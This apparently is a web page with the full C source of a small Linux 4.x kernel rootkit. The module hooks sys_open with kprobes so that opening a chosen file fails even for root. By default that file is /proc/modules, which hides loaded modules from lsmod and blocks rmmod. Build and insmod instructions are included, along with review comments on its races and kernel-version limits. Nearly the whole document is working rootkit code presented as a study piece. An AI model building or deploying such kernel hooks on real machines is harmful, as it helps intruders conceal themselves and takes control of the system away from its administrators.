    Linux 4.X Kernel Rootkit Open 
  
        
  
    
    
  
  
    
/*
 * open_rootkit.c - Thomas Moussajee
 * C Unix Rootkit open
 * Make a file forbidden for everyone, even root with the right permissions
 * HOW TO COMPILE : create a Makefile, make
 * example of Makefile :
 + KERNELDIR ?= /lib/modules/$(shell uname -r)/build
 + PWD := $(shell pwd)
 + NAME = rootkit.ko
 + all: $(NAME)
 + $(NAME):
 + $(MAKE) -C $(KERNELDIR) M=$(PWD) modules
 * HOW TO LOAD ON A KERNEL : insmod rootkit.ko
 * HOW TO UNLOAD ON A KERNEL : rmmod rootkit.ko
 * Warning: the default forbidden file is "/proc/modules", so you will not be able to unload any module ;)
 * You can change the forbidden file
 * CREATED FOR STUDY, DO NOT USE THIS ROOTKIT as a "virus"
 */
#include <linux/delay.h>
#include <linux/errno.h>
#include <linux/fcntl.h>
#include <linux/init.h>
#include <linux/kernel.h>
#include <linux/kprobes.h>
#include <linux/module.h>
#include <linux/syscalls.h>
#include <linux/types.h>
#include <asm/cacheflush.h>
#include <asm/uaccess.h>
#include <asm/uaccess.h>
/*
 * Pathname whose open() calls are refused while the module is loaded.  It is
 * compared byte-for-byte (strcmp) against the string passed to sys_open, so
 * only this exact spelling of the path is matched.
 *
 * NOTE(review): blocking /proc/modules only blinds tools that read that file
 * (lsmod, rmmod).  The loaded module still appears under /sys/module/, and the
 * probes it registers are listed in debugfs (/sys/kernel/debug/kprobes/list).
 */
#define FORBIDEN_FILE "/proc/modules"
/* Old-style entry points, defined directly rather than via module_init/exit. */
int init_module(void);
void cleanup_module(void);
/* The kprobes registration helpers are GPL-only exports; a non-GPL string here
 * would refuse to link against them. */
MODULE_LICENSE("GPL");
MODULE_AUTHOR("THOMAS MOUSSAJEE");
MODULE_DESCRIPTION("KERNEL OPEN ROOTKIT");
/*
 * Written by the sys_open entry probe, read by the return probe.  One global
 * shared by every task on every CPU with no synchronisation: two open() calls
 * in flight at the same time can overwrite each other's flag between entry and
 * return, so the refuse/allow decision is racy.
 */
static char hidden;
/*
 * jprobe entry handler mirroring sys_open's signature.  It runs with the real
 * call's arguments just before sys_open itself and records in the global
 * 'hidden' whether this open() names FORBIDEN_FILE.  A jprobe handler must end
 * with jprobe_return(); the return value after it is never observed.
 *
 * NOTE(review): 'filename' is a __user pointer that strcmp() reads directly,
 * without copying it in from user space first.  A pointer that is not mapped
 * faults in kernel context, and on SMAP-capable x86 any direct user-memory
 * access from here oopses.  The jprobe API itself was removed in Linux 4.15.
 */
asmlinkage long new_sys_open(const char __user *filename, int flags, umode_t mode)
{
	hidden = (strcmp(filename, FORBIDEN_FILE) == 0) ? 1 : 0;
	jprobe_return();
	return 0;
}
/*
 * kretprobe return handler for sys_open.  When the entry probe flagged the
 * call, overwrite the syscall's return register so user space sees -1
 * (-EPERM) instead of the descriptor sys_open just returned.
 *
 * regs->ax is x86-specific.  Only the return value is replaced: the descriptor
 * sys_open allocated is not closed here, so presumably a refused open() still
 * leaves an fd for the file in the caller's table.  'ri' is unused.
 */
static int open_ret_handler(struct kretprobe_instance *ri, struct pt_regs *regs)
{
	if (!hidden)
		return 0;
	regs->ax = -1;
	return 0;
}
/* Entry probe on sys_open: kp names the symbol, entry is the mirror handler. */
static struct jprobe my_jprobe = {
	.kp = { .symbol_name = "sys_open" },
	.entry = new_sys_open,
};
/*
 * Return probe on sys_open.  The name is a leftover: nothing here touches
 * mprotect.  No .symbol_name is given, so .kp.addr must be filled in at load
 * time.  maxactive bounds how many sys_open calls can be in flight and tracked
 * at once; calls beyond that limit are counted as missed and get no return
 * handler (the refusal is silently not applied to them).
 */
static struct kretprobe mprotect_kretprobe = {
	.maxactive = 100,
	.handler = open_ret_handler,
};
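/*
 * Module entry point: installs the sys_open entry probe and return probe.
 *
 * Returns 0 on success or a negative errno.  On any failure the probe that
 * was already registered is removed again, so the module never loads with
 * only half of the pair in place (the original code ignored the kretprobe's
 * return value and registered it even if the jprobe had failed).
 *
 * NOTE(review): kallsyms_lookup_name() is not exported to modules since
 * Linux 5.7 and jprobes were removed in 4.15, so this only builds on the
 * 4.x kernels the title refers to.
 */
int init_module(void)
{
	int ret;
	unsigned long open_addr;

	hidden = 0;

	ret = register_jprobe(&my_jprobe);
	if (ret < 0)
		return ret;

	/*
	 * The kretprobe carries no .symbol_name, so resolve the probed address
	 * by hand.  Zero means the symbol is absent on this kernel; bail out
	 * rather than registering a probe at address 0.
	 */
	open_addr = kallsyms_lookup_name("sys_open");
	if (!open_addr) {
		ret = -ENOENT;
		goto err_jprobe;
	}
	mprotect_kretprobe.kp.addr = (kprobe_opcode_t *)open_addr;

	ret = register_kretprobe(&mprotect_kretprobe);
	if (ret < 0)
		goto err_jprobe;

	return 0;

err_jprobe:
	/* Leave no half-installed probe behind. */
	unregister_jprobe(&my_jprobe);
	return ret;
}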
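/*
 * Module exit point: removes both probes.
 *
 * The original only unregistered the jprobe.  The kretprobe's struct and its
 * handler live in this module's memory, so leaving it registered past rmmod
 * would leave the kernel's kprobe list pointing at freed memory — presumably
 * an oops on the next open() after unload.  unregister_kretprobe() synchronises
 * with in-flight instances before returning, so no handler runs afterwards.
 */
void cleanup_module(void)
{
	unregister_kretprobe(&mprotect_kretprobe);
	unregister_jprobe(&my_jprobe);
}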
  